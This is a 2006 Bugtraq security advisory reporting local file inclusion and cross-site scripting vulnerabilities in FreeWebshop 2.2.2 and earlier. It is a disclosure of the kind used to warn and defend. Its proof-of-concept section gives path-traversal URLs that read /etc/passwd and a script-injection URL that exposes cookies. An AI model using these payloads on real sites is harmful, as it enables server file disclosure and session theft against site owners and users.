[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
FreeWebshop <=2.2.2 [local file include & xss]
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: FreeWebshop <=2.2.2 [local file include & xss]
- From: saps.audit@xxxxxxxxx
- Date: 8 Nov 2006 17:20:24 -0000
FreeWebshop <=2.2.2
severity: hight
vendor site: http://www.freewebshop.org/
impact: an anonymous user can access anyfile on the remote server
PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00
xss get :
http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx